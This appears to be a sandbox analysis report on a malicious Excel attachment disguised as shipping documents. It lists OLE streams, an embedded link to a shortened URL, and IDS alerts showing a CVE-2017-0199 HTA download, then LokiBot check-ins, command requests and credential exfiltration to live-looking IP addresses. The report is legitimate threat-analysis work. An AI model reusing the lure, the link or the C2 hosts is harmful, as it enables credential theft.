                                                                                    Preview:......................>...................................N...................q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...........P.......R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...r.......s...t...u...v...w...x...y...z...
                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:50:20 2024, Security: 1
                                                                                    Entropy (8bit):7.576785073850612
                                                                                    TrID:
                                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                    File name:Shipping Documents WMLREF115900.xls
                                                                                    File size:100'864 bytes
                                                                                    MD5:98502d8342f1afd8b699b26ff777a919
                                                                                    SHA1:0d0c6a6f90611fee9c232d90fca0776dbbff5241
                                                                                    SHA256:40bcfababa169393524d58a9447ea465ac7a18edd09ae9eaea2739c8d77dab9d
                                                                                    SHA512:0d1e03166c7dc08098acaeace97930fdc7bfa5b50932bbb6ee151691202389f1d7d053c2d0b0a6248ecfa7a6056bd16a0ad2a61e91a6f03d292d7ace1d5e7e86
                                                                                    SSDEEP:1536:MiqHy1S6F8b2SQrEkawpoXIow7yLHXXRD6G10u9QvuTUpx2MjeHmfDI7:UeFHrE2sIoeK3XR2GWumv6UprT
                                                                                    TLSH:AEA3F12933D6C802D4869B719EDAC0DB8A51FC96AD65CB5B32C0F31E24BD6C2D94374B
                                                                                    File Content Preview:........................>...................................N...................q..............................................................................................................................................................................
                                                                                    Icon Hash:276ea3a6a6b7bfbf
                                                                                    Document Type:OLE
                                                                                    Number of OLE Files:1
                                                                                    Has Summary Info:
                                                                                    Application Name:Microsoft Excel
                                                                                    Encrypted Document:True
                                                                                    Contains Word Document Stream:False
                                                                                    Contains Workbook/Book Stream:True
                                                                                    Contains PowerPoint Document Stream:False
                                                                                    Contains Visio Document Stream:False
                                                                                    Contains ObjectPool Stream:False
                                                                                    Flash Objects Count:0
                                                                                    Contains VBA Macros:True
                                                                                    Code Page:1252
                                                                                    Author:WORMS
                                                                                    Last Saved By:91974
                                                                                    Create Time:2013-09-08T10:39:32Z
                                                                                    Last Saved Time:2024-10-22T13:14:21Z
                                                                                    Creating Application:Microsoft Excel
                                                                                    Security:0
                                                                                    Document Code Page:1252
                                                                                    Thumbnail Scaling Desired:false
                                                                                    Company:MAHIEDDINE
                                                                                    Contains Dirty Links:false
                                                                                    Shared Document:false
                                                                                    Changed Hyperlinks:false
                                                                                    Application Version:12.0000
                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                    VBA File Name:Sheet1.cls
                                                                                    Stream Size:977
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 81 20 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Attribute VB_Name = "Sheet1"
                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                    Attribute VB_Creatable = False
                                                                                    Attribute VB_PredeclaredId = True
                                                                                    Attribute VB_Exposed = True
                                                                                    Attribute VB_TemplateDerived = False
                                                                                    Attribute VB_Customizable = True
                                                                                    

                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                    VBA File Name:Sheet2.cls
                                                                                    Stream Size:977
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < q e . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 71 65 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Attribute VB_Name = "Sheet2"
                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                    Attribute VB_Creatable = False
                                                                                    Attribute VB_PredeclaredId = True
                                                                                    Attribute VB_Exposed = True
                                                                                    Attribute VB_TemplateDerived = False
                                                                                    Attribute VB_Customizable = True
                                                                                    

                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                    VBA File Name:Sheet3.cls
                                                                                    Stream Size:977
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < z D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 7a 44 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Attribute VB_Name = "Sheet3"
                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                    Attribute VB_Creatable = False
                                                                                    Attribute VB_PredeclaredId = True
                                                                                    Attribute VB_Exposed = True
                                                                                    Attribute VB_TemplateDerived = False
                                                                                    Attribute VB_Customizable = True
                                                                                    

                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                    Stream Size:985
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 1a f6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                    Attribute VB_Creatable = False
                                                                                    Attribute VB_PredeclaredId = True
                                                                                    Attribute VB_Exposed = True
                                                                                    Attribute VB_TemplateDerived = False
                                                                                    Attribute VB_Customizable = True
                                                                                    

                                                                                    General
                                                                                    Stream Path:\x1CompObj
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:114
                                                                                    Entropy:4.25248375192737
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    General
                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:244
                                                                                    Entropy:2.889430592781307
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                    General
                                                                                    Stream Path:\x5SummaryInformation
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:200
                                                                                    Entropy:3.2403503175049813
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . H % . . . . . . . . .
                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                    General
                                                                                    Stream Path:MBd0002400B/\x1CompObj
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:99
                                                                                    Entropy:3.631242196770981
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    General
                                                                                    Stream Path:MBd0002400B/Package
                                                                                    CLSID:
                                                                                    File Type:Microsoft Excel 2007+
                                                                                    Stream Size:38341
                                                                                    Entropy:7.85773182578822
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    General
                                                                                    Stream Path:MBd0002400C/\x1Ole
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:612
                                                                                    Entropy:4.971262337053294
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:. . . . @ U > d L $ . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . m . p . a . . . l . i . / . u . i . k . l . D . r . ? . & . c . o . l . l . o . q . u . i . a . = . w . i . s . t . f . u . l . & . s . t . a . d . i . u . m . = . t . a . n . g . y . & . e . a . r . t . h . q . u . a . k . e . = . f . e . i . g . n . e . d . & . o . f . f . i . c . i . a . l . = . q . u . i . z . z . i . c . a . l . & . d . i . s . p . l . a . y . = . f . e . a . r . l . e . s . s . & . t .
                                                                                    Data Raw:01 00 00 02 db 40 ab 55 3e 64 4c 24 00 00 00 00 00 00 00 00 00 00 00 00 aa 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b a6 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6d 00 70 00 61 00 2e 00 6c 00 69 00 2f 00 75 00 69 00 6b 00 6c 00 44 00 72 00 3f 00 26 00 63 00 6f 00 6c 00 6c 00 6f 00 71 00 75 00 69 00 61 00 3d 00 77 00 69 00 73 00 74 00 66 00 75 00 6c 00
                                                                                    General
                                                                                    Stream Path:Workbook
                                                                                    CLSID:
                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                    Stream Size:47149
                                                                                    Entropy:7.9740179597932555
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . d . . . 3 v . ) 8 b R , 4 X l B ' 1 . # . . j . = 5 C . . . . . . . 2 . . . \\ . p . T m 8 P . j U m . N ) . . , . 9 . ~ = O . ! ; ' v ` [ q e # , . . Q . p | @ Y . . i . . P . G Z . d B . . . . a . . . ^ . . . = . . . . . . . . i 2 @ . o K . . . . . * . . . . . . _ . . . . h . . . . . . . g . . . , Z = . . . . . m Y g c G 1 N ~ . - @ . . . j . . . . a " . . . Z . . . . u . . . . . . D 1 . . . 8 C ] * P 5 . . . . 3 m Q 1 . . . . ; X . . $ . 3 i . . M
                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a7 64 d9 89 2e e5 0b 84 b6 e5 33 76 97 8f 11 ed 96 29 e1 38 62 52 2c 34 58 6c b1 89 42 27 31 e7 8e ed 0a 23 a1 8d 10 c4 ad 6a 03 3d d8 35 43 98 e1 00 02 00 b0 04 c1 00 02 00 32 d9 e2 00 00 00 5c 00 70 00 b7 54 b4 6d e6 97 dc f0 38 50 84 11 6a a5 55 e2 b2 fb 6d 0c 4e 9c 29 ab a7 b8 96 14 1b eb
                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                    CLSID:
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Stream Size:529
                                                                                    Entropy:5.270033320300745
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:I D = " { 4 8 C A B 2 3 3 - A F B 3 - 4 E E F - B 9 7 D - 7 C 5 F 2 D 8 D 7 6 8 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 7 2 5 0 B 9 2 0 D 9 6 D 4 9 A D
                                                                                    Data Raw:49 44 3d 22 7b 34 38 43 41 42 32 33 33 2d 41 46 42 33 2d 34 45 45 46 2d 42 39 37 44 2d 37 43 35 46 32 44 38 44 37 36 38 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:104
                                                                                    Entropy:3.0488640812019017
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:2644
                                                                                    Entropy:3.984941962751876
                                                                                    Base64 Encoded:False
                                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                    General
                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                    CLSID:
                                                                                    File Type:data
                                                                                    Stream Size:553
                                                                                    Entropy:6.356559220010791
                                                                                    Base64 Encoded:True
                                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . + i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 03 e2 2b 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-24T08:45:24.692895+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.176.14180TCP
                                                                                    2024-10-24T08:45:24.692922+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.176.14180192.168.2.2249164TCP
                                                                                    2024-10-24T08:45:27.389849+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166192.3.176.14180TCP
                                                                                    2024-10-24T08:45:27.389909+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.176.14180192.168.2.2249166TCP
                                                                                    2024-10-24T08:45:46.719121+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249174192.3.176.14180TCP
                                                                                    2024-10-24T08:45:47.325286+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.186.97443192.168.2.2249169TCP
                                                                                    2024-10-24T08:46:06.918306+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.186.97443192.168.2.2249176TCP
                                                                                    2024-10-24T08:46:07.501003+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.22080TCP
                                                                                    2024-10-24T08:46:07.501003+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.22080TCP
                                                                                    2024-10-24T08:46:07.501003+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.22080TCP
                                                                                    2024-10-24T08:46:08.436934+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917894.156.177.22080TCP
                                                                                    2024-10-24T08:46:08.603129+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.22080TCP
                                                                                    2024-10-24T08:46:08.603129+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.22080TCP
                                                                                    2024-10-24T08:46:08.603129+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.22080TCP
                                                                                    2024-10-24T08:46:09.533913+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917994.156.177.22080TCP
                                                                                    2024-10-24T08:46:09.653987+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.22080TCP
                                                                                    2024-10-24T08:46:09.653987+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.22080TCP
                                                                                    2024-10-24T08:46:09.653987+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.22080TCP
                                                                                    2024-10-24T08:46:10.615957+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918094.156.177.22080TCP
                                                                                    2024-10-24T08:46:10.615957+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918094.156.177.22080TCP
                                                                                    2024-10-24T08:46:10.621545+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249180TCP
                                                                                    2024-10-24T08:46:10.793925+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.22080TCP
                                                                                    2024-10-24T08:46:10.793925+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.22080TCP
                                                                                    2024-10-24T08:46:10.793925+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.22080TCP
                                                                                    2024-10-24T08:46:11.760826+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.22080TCP
                                                                                    2024-10-24T08:46:11.760826+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.22080TCP
                                                                                    2024-10-24T08:46:11.766708+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249181TCP
                                                                                    2024-10-24T08:46:11.962080+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.22080TCP
                                                                                    2024-10-24T08:46:11.962080+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.22080TCP
                                                                                    2024-10-24T08:46:11.962080+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.22080TCP
                                                                                    2024-10-24T08:46:13.013301+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.22080TCP
                                                                                    2024-10-24T08:46:13.013301+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.22080TCP
                                                                                    2024-10-24T08:46:13.019152+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249182TCP
                                                                                    2024-10-24T08:46:13.263396+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.22080TCP
                                                                                    2024-10-24T08:46:13.263396+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.22080TCP
                                                                                    2024-10-24T08:46:13.263396+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.22080TCP
                                                                                    2024-10-24T08:46:14.275753+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.22080TCP
                                                                                    2024-10-24T08:46:14.275753+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.22080TCP
                                                                                    2024-10-24T08:46:14.281509+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249183TCP
                                                                                    2024-10-24T08:46:14.530065+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.22080TCP
                                                                                    2024-10-24T08:46:14.530065+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.22080TCP
